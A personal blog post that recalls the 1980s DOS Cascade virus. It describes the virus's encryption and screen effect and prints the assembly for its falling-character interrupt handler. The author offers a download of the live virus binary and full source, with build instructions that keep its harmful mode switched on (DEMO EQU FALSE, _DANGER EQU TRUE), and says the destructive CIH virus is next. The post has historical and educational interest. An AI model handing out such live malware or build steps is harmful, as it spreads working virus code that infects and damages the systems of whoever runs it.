Cascade Virus: Down the memory lane.

I have always been fascinated with computer virii. My first exposure to computer virii was back in 1994, when my 360KB floppy disk got infected by STONED. The hype around virii was so much and I was so misinformed, I kept that infected disk in the jacket, away from all other diskettes I owned for 2 weeks!! No, I am not kidding.

Gokul, (owner of Port Bit Systems/Trichy, who was my first computer teacher) looked like a hero to me, when he could magically clean the infection by running a command line DOS McAfee. Man,those days were cool! Later when I started learning x86 assembly and DOS internals, I got fully absorbed in to the wonder world of DOS virii. (I still have the first DOS anti-virus program I wrote – “(C) Brain” remover – somewhere in my old HDD). “Computer Viruses: Prevention, detection and cure” by Rajneesh Kapur was my first viruses book; An excellent one! This is out of print now, can’t even find it in the original publishers site.

One virus I fondly remember to this day, is the famous (!?) CASCADE virus (a.k.a Raindrop/17xx). This virus was a non-overwriting, resident COM infector. When triggered it made the characters in the screen fall in to a nice heap at the bottom. (Remember, we were in the command line mode then!). It was kind of cool to see this cascading action.

Cascade was the first virus to use encryption. The virus consisted of two parts – the virus body and an encryption routine. The latter encrypted the body of the virus so that it appeared different in every infected file. After loading the file, control was transferred to the decryption routine which decoded the virus body and transferred control to it. Unlike future polymorphic viruses, Cascade encoded only the body of the virus. The size of the infected file was used as the decryption key. Since the decryption routine remained unchanged, antivirus programs detected the virus with ease.

If you have never seen the virus in action, look at the screen shots below:

I took the above screen shots from an infected machine I setup. Last week, because of some re-orgs in my group (more about this in a later post!), I had enough time to install DOS in a VM & infect it with CASCADE. It actually felt good to use MASM after a long time, to produce the live virus. Triggering the virus (setting the date to 11-30-1988) was a simple thing. If you think all of this is too much work, download the virtual HD from here. (TODO [Mar24,2008]: Link is not up yet. I will upload the VDI somewhere online and update this post. Please do let me know if you know of any reliable online file storing sites. TIA.). BTW, I used the open source VirtualBox for creating the testbed.

Alternatively, download the floppy disk image from here:

It has the floppy img. with live virus & source. You can burn this to a 1.44MB floppy disk (or use a IMG-aware program to open it) after unzipping.

What is in the disk?

I have included the following:

• cascade.asm
  • The source code of the actual virus. This is the cleaned up version that I used for building the virus.
• cascade.com
  • Live virus. Do not execute this in an unprotected system, if you don’t know what you are doing. Be careful.
    
• makehlv.bat
  • Cleaned up (for masm/x2b) make BAT file. Execute this from the prompt to build the virus.
• readme.txt
  • Contains a description of file and SW requirements.

How to build the virus?

I used MASM 6.11d (16bit assembler) along with X2B (EXE -> COM Converter) for building the virus. You also need DOS debug executable for patching up the initial jump (automatically done by makehlv.bat). If you are using exe2bin, you have to modify makehlv.bat accordingly.

Once you have the environment setup, follow these steps:

1. Open cascade.asm. Find “DEMO EQU FALSE” (It should be near line number 13). If you make this “DEMO EQU TRUE”, virus will not exhibit any harmful things. For our purpose, leave it at “DEMO EQU FALSE”.
2. Add “_DANGER EQU TRUE” after this line.
3. Now, execute the following command from the command line to build the virus: makehlv cascade

Virus in action:

Video is always better than a static picture. Don’t you agree? Look at the following video I captured:

I also found another excellent video:

Virus Code:

The actual cascading is implemented in the following INT 1C handler. The function Random is called for obtaining a random screen row and a column. If the character there is not SPACE, it is moved accordingly downwards. Speaker is toggled, which you won’t get to to know if you run this in a VM. The code is pretty self explanatory.

You can get the complete source code here:

XI_048       LABEL   NEAR
XR_009      EQU     XI_048 + PSPsize
 	TEST    CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom
 	JZ      XI_049
 	JMP     XI_067
XI_049:      OR      CS:[ISR_Flags],MASK R_in_1c
 	DEC     CS:[XR_002]
 	JZ      XI_050
 	JMP     XI_066
XI_050:     SAVE    DS,ES
 	MOV_S   DS,CS
 	MOV_S   ES,CS
 	SAVE    AX,BX,CX,DX,SI,DI,BP
 	MOV     AL,EOI_8259A
 	OUT     PORT_B_8259A,AL
 	MOV     AX,[XR_003]
 	CMP     AX,0438
 	JNB     XI_051
 	MOV     AX,0438
XI_051:     CALL    Random
 	INC     AX
 	MOV     [XR_002],AX
 	MOV     [XR_003],AX
 	PUSH    DS
 	MOV     AX,BIOSDATASEG
 	MOV     DS,AX
 	MOV     AX,[B_VidPage]
 	POP     DS
 	MOV     [Page_offset],AX
 	MOV     [Last_Line],18
 	MOV     DL,-1
 	MOV     AX,1130
 	MOV     BH,0
 	SAVE    ES,BP
 	INT     10
 	REST    BP,E
 	CMP     DL,-1
 	JZ      XI_052
 	MOV     [Last_Line],DL
XI_052:         CALL    GetSysSpeed
 	MOV     AH,0F
 	INT     10
 	MOV     [Num_of_Col],AH
 	MOV     [Prevent_Snow?],0
 	MOV     [Seg_of_VRAM],MonoBase
 	CMP     AL,07
 	JZ      XI_054
 	JB      XI_053
 	JMP     XI_064
XI_053:         MOV     [Seg_of_VRAM],ColorBase
 	CMP     AL,03
 	JA      XI_054
 	CMP     AL,02
 	JB      XI_054
 	MOV     [Prevent_Snow?],01
 	MOV     AL,[Last_Line]
 	INC     AL
 	MUL     [Num_of_Col]
 	MOV     [Num_of_char],AX
 	MOV     AX,[XR_004]
 	CMP     AX,[Num_of_char]
 	JBE     XI_054
 	MOV     AX,[Num_of_char]
XI_054:         CALL    Random
 	INC     AX
 	MOV     SI,AX
XI_055:         XOR     DI,DI
XI_056:         INC     DI
 	MOV     AX,[Num_of_char]
 	SHL     AX,1
 	CMP     DI,AX
 	JBE     XI_057
 	JMP     XI_064
XI_057:         OR      [ISR_Flags],MASK Recf_1
 	MOV     AL,[Num_of_Col]
 	MOV     AH,0
 	CALL    Random
 	MOV     DL,AL
 	MOV     AL,[Last_Line]
 	MOV     AH,0
 	CALL    Random
 	MOV     DH,AL
 	CALL    Load_from_VRAM
 	CALL    Is_it_blank_?
 	JB      XI_056
 	CALL    Spec_Graphik?
 	JB      XI_056
 	MOV     [Last_Pair],AX
 	MOV     CL,[Last_Line]
 	MOV     CH,0
XI_058:         INC     DH
 	CMP     DH,[Last_Line]
 	JA      XI_062
 	CALL    Load_from_VRAM
 	CMP     AH,[Last_Attr]
 	JNZ     XI_062
 	CALL    Is_it_blank_?
 	JB      XI_060
XI_059:         CALL    Spec_Graphik?
 	JB      XI_062
 	INC     DH
 	CMP     DH,[Last_Line]
 	JA      XI_062
 	CALL    Load_from_VRAM
 	CMP     AH,[Last_Attr]
 	JNZ     XI_062
 	CALL    Is_it_blank_?
 	JNB     XI_059
 	CALL    Toggle_Speaker
 	DEC     DH
 	CALL    Load_from_VRAM
 	MOV     [Last_Char],AL
 	INC     DH
XI_060:         AND     [ISR_Flags],NOT MASK Recf_1
 	DEC     DH
 	MOV     AL,' '
 	CALL    Write_to_VRAM
 	INC     DH
 	MOV     AL,[Last_Char]
 	CALL    Write_to_VRAM
 	JCXZ    XI_061
 	CALL    Delay
 	DEC     CX
XI_061:         JMP     XI_058
XI_062:         TEST    [ISR_Flags],MASK Recf_1
 	JZ      XI_063
 	JMP     XI_056
XI_063:         CALL    Toggle_Speaker
 	DEC     SI
 	JZ      XI_064
 	JMP     XI_055
XI_064:         IN      AL,PORT_B_8255
 	AND     AL,0FC
 	OUT     PORT_B_8255,AL
 	MOV     AX,3
 	CALL    Random
 	INC     AX
 	MUL     [XR_004]
 	JNB     XI_065
 	MOV     AX,-1
XI_065:         MOV     [XR_004],AX
 	REST    BP,DI,SI,DX,CX,BX,AX,ES,DS
XI_066:         AND     CS:[ISR_Flags],NOT MASK R_in_1c
XI_067:         JMP     DWORD PTR CS:[Org_Int_1C]

My next target is to try a destructive virus like CIH. I will let you know what happens. Till then enjoy the mesmerizing cascade effect

[Updated: May 16, 2010 - Fixed the download link]

Tags: 1.44MB, Cascade, Computer Virus, DOS, Security, Virii, Virtualbox, virus